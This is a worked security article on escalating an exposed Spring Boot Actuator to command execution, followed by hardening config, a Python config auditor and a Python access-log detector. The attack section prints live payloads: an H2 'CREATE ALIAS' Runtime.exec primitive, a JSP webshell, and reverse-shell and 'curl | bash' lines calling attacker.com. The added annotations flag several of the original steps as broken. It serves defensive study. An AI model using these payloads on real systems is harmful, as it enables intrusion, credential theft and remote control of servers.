# Spring Boot Actuator: from unauthenticated access to getshell, a worked analysis
## 0x00 Preface
Spring Boot Actuator is the production-grade module Spring Boot ships for monitoring and managing an application. When it is misconfigured, the sensitive endpoints it exposes become an attacker's way through the perimeter. This article walks through one complete penetration-test case and shows, step by step, how an unauthenticated Actuator exposure is escalated to control of the server.
## 0x01 Background
### 1.1 Actuator endpoints
Spring Boot Actuator provides the following key endpoints (partial list):
```plaintext
/actuator/health   - application health status
/actuator/env      - environment variables and configuration properties
/actuator/beans    - all Spring beans
/actuator/mappings - URL route mappings
/actuator/heapdump - heap memory dump
```
In Spring Boot 1.x the same endpoints are served at the root (`/env`, `/heapdump`) rather than under `/actuator`. Over HTTP, Spring Boot 2.x exposes only `health` by default (plus `info` in older 2.x releases); `env`, `heapdump` and the rest appear only when the exposure list is widened.
### 1.2 Typical misconfiguration
```yaml
# application.yml, misconfigured
management:
  endpoints:
    web:
      exposure:
        include: "*"          # exposes every endpoint, env and heapdump included
  endpoint:
    health:
      show-details: always    # health component details (datasource, disk, ...) shown to anyone
```
## 0x02 Endpoint discovery
Scanning with an automated tool, or simply requesting the discovery document, reveals the exposed endpoints:
```bash
$ curl http://target.com/actuator
```
```json
{
  "_links": {
    "env": {"href": "/actuator/env"},
    "heapdump": {"href": "/actuator/heapdump"},
    "mappings": {"href": "/actuator/mappings"}
  }
}
```
The presence of `env` and `heapdump` in `_links` already tells you the exposure list was widened beyond the default.
## 0x03 Extracting secrets
Read the `env` endpoint to obtain the key configuration; it returns every property source, including the process environment:
```bash
$ curl http://target.com/actuator/env
```
```json
{
  "activeProfiles": ["prod"],
  "propertySources": [
    {
      "name": "systemEnvironment",
      "properties": {
        "DATABASE_PASSWORD": {"value": "P@ssw0rd123!"},
        "API_KEY": {"value": "sk_live_abcdef123456"}
      }
    }
  ]
}
```
A caveat the original omits: Spring Boot 1.x and 2.x mask values whose key ends in `password`, `secret`, `key`, `token` or contains `credentials` (they are returned as `******`), and Spring Boot 3 masks every value unless `management.endpoint.env.show-values` is changed from its default `never`. Output like the above therefore means sanitization was turned off, or the secret sat under a key the pattern misses (for example `DB_PASS`). The heap dump below sidesteps the masking entirely, which is why it is the more valuable endpoint.
The heap dump contains the live objects of the JVM, masked or not:
```bash
$ wget http://target.com/actuator/heapdump -O memory.hprof
```
Loading `memory.hprof` in a heap analyzer (Eclipse MAT, VisualVM) and browsing the connection-pool objects turns up the plaintext database password:
```plaintext
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
  -> connectionProperties = {user=admin, password=Admin@123}
```
## 0x04 From configuration write to command execution
When the `env` endpoint accepts POST (an unsecured Spring Boot 1.x application, or Spring Boot 2.x with Spring Cloud's writable environment endpoint) and `/refresh` exists (spring-cloud-context), the attacker can rewrite a property that the connection pool hands to the database as SQL. Against an H2 datasource, `CREATE ALIAS` compiles Java source at runtime, so the validation query becomes a code-loading primitive:
```http
POST /actuator/env HTTP/1.1
Content-Type: application/json

{
  "name": "spring.datasource.tomcat.validation-query",
  "value": "CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"success\";}';"
}
```
```http
POST /actuator/refresh HTTP/1.1
```
The original write-up then calls the alias with
```http
GET /actuator/datasource?query=EXEC('nc+-e+/bin/bash+attacker.com+4444') HTTP/1.1
```
but Actuator has no such endpoint. The injected SQL runs only when the pool validates a connection, so the alias has to be invoked the same way it was created: point the validation query at `CALL EXEC('nc -e /bin/bash attacker.com 4444')` and refresh again. Two preconditions to verify before relying on this chain: `spring.datasource.tomcat.validation-query` applies to the Tomcat JDBC pool only, and with HikariCP (the Spring Boot 2.x default) the property is `spring.datasource.hikari.connection-test-query`; and compiling the alias needs a Java compiler at runtime (the JDK's `javax.tools`, or Janino on the classpath), which a JRE-only container image lacks. The shell runs as the application user, and the property change lives in memory only, so a restart undoes it.
The original's second H2 payload, which it calls "SQL injection", is not an injection but further SQL executed through the same property rewrite: it stores a JSP webshell as table contents.
```sql
CREATE TABLE shell(
  id INT PRIMARY KEY,
  content VARCHAR(1024)  -- the original declared VARCHAR(255); the JSP below is about 290 characters and would be rejected as too long
) AS VALUES (1, '<%@page import="java.util.*,java.io.*"%><% if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));String line;while((line=br.readLine())!=null){out.println(line);}}%>');
```
On its own this only places text in the database. It becomes a webshell only if the row is later written into a directory the servlet container serves (H2's file-writing functions such as `CSVWRITE` are the usual vehicle), which the original does not show and which requires a writable exploded deployment rather than a packaged jar.
For persistence the original rewrites HikariCP's `connection-init-sql`, which the pool runs on every new connection, to create a scheduled database event:
```http
POST /actuator/env HTTP/1.1
Content-Type: application/json

{
  "name": "spring.datasource.hikari.connection-init-sql",
  "value": "CREATE EVENT IF NOT EXISTS backdoor ON SCHEDULE EVERY 1 MINUTE DO CALL EXEC('curl http://attacker.com/shell.sh | bash')"
}
```
The original labels this a "cron expression injection". It is MySQL's event-scheduler syntax (`CREATE EVENT ... ON SCHEDULE EVERY`), which H2 does not implement, and MySQL has no `EXEC` routine, so the statement is not runnable as written on either database. What it does illustrate is the durable part of the idea: a property the pool replays on every connection outlives the attacker's session and re-fires each time the pool recycles, until the process restarts.
## 0x05 Hardening
Expose only what is needed, and keep the dangerous endpoints off the HTTP interface altogether:
```yaml
management:
  endpoints:
    web:
      exposure:
        include: health,info   # expose only the endpoints you actually need
      base-path: /internal     # relocates the default path; obscurity only, keep the auth below
  endpoint:
    shutdown:
      enabled: false           # already the default, stated explicitly
```
On Spring Boot 3 also leave `management.endpoint.env.show-values` at its default `never` so that, even if `env` is ever exposed, values stay masked.
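An added example, not part of the original article: a dependency-free audit that parses the misconfigured and hardened `application.yml` fragments shown on this page and reports the settings that widen the attack surface. The parser handles only the indented map/scalar subset those fragments use (no lists, anchors or multi-line scalars); the property names checked are Spring Boot's documented ones, and the two config strings are constructed from the page.

```python
from typing import Dict, List


def parse_simple_yaml(text: str) -> dict:
    """Parse the nested-map/scalar YAML subset used in application.yml snippets.
    Comments after ' #' are dropped; anything else (lists, anchors) raises."""
    root: dict = {}
    stack = [(-1, root)]  # (indent, mapping) for the current nesting path
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.lstrip().startswith("#"):
            continue
        if " #" in line:
            line = line[: line.index(" #")].rstrip()
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, sep, value = line.strip().partition(":")
        if not sep:
            raise ValueError(f"unsupported line: {raw!r}")
        while stack[-1][0] >= indent:       # climb back out to the parent level
            stack.pop()
        parent = stack[-1][1]
        value = value.strip().strip("\"'")
        if value:
            parent[key.strip()] = value
        else:
            child: dict = {}
            parent[key.strip()] = child
            stack.append((indent, child))
    return root


def flatten(tree: dict, prefix: str = "") -> Dict[str, str]:
    """Turn the nested mapping into dotted Spring property names."""
    out: Dict[str, str] = {}
    for key, value in tree.items():
        path = f"{prefix}.{key}" if prefix else key
        if isinstance(value, dict):
            out.update(flatten(value, path))
        else:
            out[path] = value
    return out


# Endpoints that leak secrets, change configuration or hand over memory.
DANGEROUS_ENDPOINTS = {"env", "heapdump", "jolokia", "refresh", "restart", "shutdown",
                       "beans", "mappings", "configprops", "threaddump", "logfile"}


def audit_actuator_config(yaml_text: str) -> List[str]:
    props = flatten(parse_simple_yaml(yaml_text))
    findings: List[str] = []
    # Spring Boot 2.x/3.x: what is reachable over HTTP (default: health only).
    include = props.get("management.endpoints.web.exposure.include", "health")
    exposed = {e.strip().lower() for e in include.split(",")}
    if "*" in exposed:
        findings.append("management.endpoints.web.exposure.include=* exposes every endpoint, env and heapdump included")
    elif exposed & DANGEROUS_ENDPOINTS:
        findings.append("sensitive endpoints exposed over HTTP: " + ", ".join(sorted(exposed & DANGEROUS_ENDPOINTS)))
    # Spring Boot 3.x: env values are masked unless show-values was relaxed.
    if props.get("management.endpoint.env.show-values", "never").lower() == "always":
        findings.append("management.endpoint.env.show-values=always disables masking of secrets in /env")
    if props.get("management.endpoint.health.show-details", "never").lower() == "always":
        findings.append("management.endpoint.health.show-details=always reveals datasource/disk details to unauthenticated callers")
    # Spring Boot 1.x: sensitive endpoints served without authentication.
    if props.get("management.security.enabled", "true").lower() == "false":
        findings.append("management.security.enabled=false (Boot 1.x) disables authentication on sensitive endpoints")
    return findings


# Constructed from the page's misconfigured and hardened fragments.
WEAK_CONFIG = """
management:
  endpoints:
    web:
      exposure:
        include: "*"   # expose every endpoint
  endpoint:
    health:
      show-details: always
"""

HARDENED_CONFIG = """
management:
  endpoints:
    web:
      exposure:
        include: health,info   # only what is needed
      base-path: /internal     # relocated base path
  endpoint:
    shutdown:
      enabled: false
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit_actuator_config(cfg) or ['no findings']}")
```

Relocating the base path deliberately produces no finding: it changes nothing about who can reach the endpoints, so the audit treats it as neutral rather than as a control.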
Require authentication on every Actuator endpoint, whatever its base path (Spring Boot 2.x, Spring Security 5):
```java
import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;

// Every actuator endpoint requires HTTP Basic authentication with the ADMIN role.
// WebSecurityConfigurerAdapter is deprecated in Spring Security 5.7 and removed in 6;
// there the same rule is registered as a SecurityFilterChain bean.
@Configuration
public class ActuatorSecurity extends WebSecurityConfigurerAdapter {
    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http.requestMatcher(EndpointRequest.toAnyEndpoint())   // matches by endpoint, not by path, so base-path changes are covered
            .authorizeRequests().anyRequest().hasRole("ADMIN")
            .and().httpBasic();
    }
}
```
If a load balancer or Kubernetes probe must read `/health` unauthenticated, carve it out with `EndpointRequest.to("health")` and `permitAll()` before the catch-all rule, and keep the details hidden with `show-details: when-authorized`.
Restrict at the reverse proxy as well:
```nginx
location ~ ^/actuator {
    allow 192.168.1.0/24;
    deny  all;
    auth_basic           "Restricted";
    auth_basic_user_file /etc/nginx/.htpasswd;
}
```
nginx applies both conditions by default (`satisfy all`), so a caller needs the source network and valid credentials. If the base path was moved to `/internal`, the `location` must follow it, and remember that a proxy rule protects nothing for traffic that reaches the application port directly; the application-level rule above stays in place.
## 0x06 Detection
Request patterns worth alerting on:
- bursts of requests to `/actuator/env` (or `/env` on Spring Boot 1.x) from one source
- POST requests that change runtime configuration (`/env`, `/refresh`, `/restart`)
- downloads of `/actuator/heapdump`
- scanner-style User-Agents touching Actuator paths
Log lines from the original write-up:
```plaintext
2023-07-15 14:32:17 WARN o.s.b.a.e.web.EndpointLinksResolver - Potential malicious access attempt from 45.33.12.8 to /actuator/heapdump
2023-07-15 14:33:45 ERROR o.a.c.c.C.[.[.[/].[dispatcherServlet] - Servlet.service() for servlet [dispatcherServlet] threw exception: org.springframework.security.authentication.BadCredentialsException
```
A caveat: Actuator does not log "potential malicious access", and `EndpointLinksResolver` only builds the `_links` document, so the first line can only come from custom instrumentation (a servlet filter or a WAF). The second is a genuine symptom once the endpoints sit behind authentication. The dependable source for the patterns above is the reverse-proxy or ingress access log, which records every request whether or not the application logs it.
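The patterns above as detection logic, added here as an example that is not from the original article. It runs over access-log lines in nginx's combined format; the log lines are constructed for the walkthrough, and the thresholds, endpoint list and User-Agent patterns are assumptions to tune for your environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# nginx/Apache "combined" format; fields we do not use are skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Endpoints that leak secrets, change configuration or hand over process memory.
SENSITIVE = {"env", "heapdump", "jolokia", "refresh", "restart", "shutdown",
             "mappings", "beans", "configprops", "threaddump", "logfile"}
WRITE_ENDPOINTS = {"env", "refresh", "restart", "shutdown"}
SCANNER_UA = re.compile(r"(?i)(python-requests|curl/|sqlmap|nuclei|nmap|masscan|go-http-client|java/)")


def endpoint_of(path: str) -> Optional[str]:
    """Actuator endpoint named in a path, independent of the base path:
    /env (Boot 1.x), /actuator/env (Boot 2.x) and /internal/env (relocated)
    all return "env"; query strings and sub-paths are ignored."""
    for seg in path.split("?", 1)[0].strip("/").lower().split("/"):
        if seg in SENSITIVE:
            return seg
    return None


def detect(lines: List[str], burst_threshold: int = 3, burst_window_s: int = 60) -> List[Dict[str, object]]:
    """Run the four rules over access-log lines; alerts come back in log order."""
    alerts: List[Dict[str, object]] = []
    env_reads = defaultdict(deque)        # ip -> recent timestamps of GET .../env
    burst_seen, ua_seen = set(), set()    # report each IP once per noisy rule

    def alert(rule: str, ip: str, n: int, method: str, path: str) -> None:
        alerts.append({"rule": rule, "ip": ip, "line": n, "request": f"{method} {path}"})

    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue                       # not combined format: skip, do not crash
        ip, method, path, ua = m["ip"], m["method"], m["path"], m["ua"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ep = endpoint_of(path)
        touches_actuator = ep is not None or "/actuator" in path.lower()

        # Rule 1: tooling User-Agent on an actuator path.
        if touches_actuator and SCANNER_UA.search(ua) and ip not in ua_seen:
            ua_seen.add(ip)
            alert("scanner-user-agent", ip, n, method, path)
        # Rule 2: any attempt to write runtime configuration.
        if method in ("POST", "PUT") and ep in WRITE_ENDPOINTS:
            alert("config-write-attempt", ip, n, method, path)
        # Rule 3: a served heap dump (memory, unmasked secrets included, left the host).
        if ep == "heapdump" and m["status"] == "200":
            alert("heapdump-download", ip, n, method, path)
        # Rule 4: repeated env reads from one IP inside the window.
        if ep == "env" and method == "GET":
            recent = env_reads[ip]
            recent.append(ts)
            while recent and (ts - recent[0]) > timedelta(seconds=burst_window_s):
                recent.popleft()
            if len(recent) >= burst_threshold and ip not in burst_seen:
                burst_seen.add(ip)
                alert("env-read-burst", ip, n, method, path)
    return alerts


# Constructed access-log lines for the walkthrough (not real traffic).
SAMPLE_LOG = [
    '45.33.12.8 - - [15/Jul/2023:14:32:01 +0000] "GET /actuator HTTP/1.1" 200 312 "-" "python-requests/2.31.0"',
    '45.33.12.8 - - [15/Jul/2023:14:32:05 +0000] "GET /actuator/env HTTP/1.1" 200 8712 "-" "python-requests/2.31.0"',
    '45.33.12.8 - - [15/Jul/2023:14:32:08 +0000] "GET /actuator/env HTTP/1.1" 200 8712 "-" "python-requests/2.31.0"',
    '45.33.12.8 - - [15/Jul/2023:14:32:11 +0000] "GET /actuator/env HTTP/1.1" 200 8712 "-" "python-requests/2.31.0"',
    '45.33.12.8 - - [15/Jul/2023:14:32:17 +0000] "GET /actuator/heapdump HTTP/1.1" 200 104857600 "-" "python-requests/2.31.0"',
    '45.33.12.8 - - [15/Jul/2023:14:33:40 +0000] "POST /actuator/env HTTP/1.1" 200 0 "-" "python-requests/2.31.0"',
    '10.0.0.5 - - [15/Jul/2023:14:35:00 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.27"',
    '203.0.113.7 - - [15/Jul/2023:14:36:12 +0000] "GET /internal/env HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f'line {a["line"]}: {a["rule"]:<22} {a["ip"]}  {a["request"]}')
```

The last two sample lines are the negative cases: a probe reading `/health` and a single, rejected read of a relocated `/internal/env` produce nothing, while the scanning host trips all four rules in sequence.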
A startup-time guard from the original, with imports and the comment translated:
```java
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

// Startup hardening example
@SpringBootApplication
public class Application {
    public static void main(String[] args) {
        SpringApplication app = new SpringApplication(Application.class);
        app.setAddCommandLineProperties(false); // do not let --key=value arguments override properties
        app.run(args);
    }
}
```
This only stops command-line arguments from becoming a property source (a stray `--management.endpoints.web.exposure.include=*` can no longer widen exposure at launch). It has no effect on the in-memory `/env` write path, which is closed by not exposing `env` over HTTP and by the authentication rules above.
Note: the techniques described in this article are for security research only; do not use them for illegal purposes. Obtain written authorization before any test.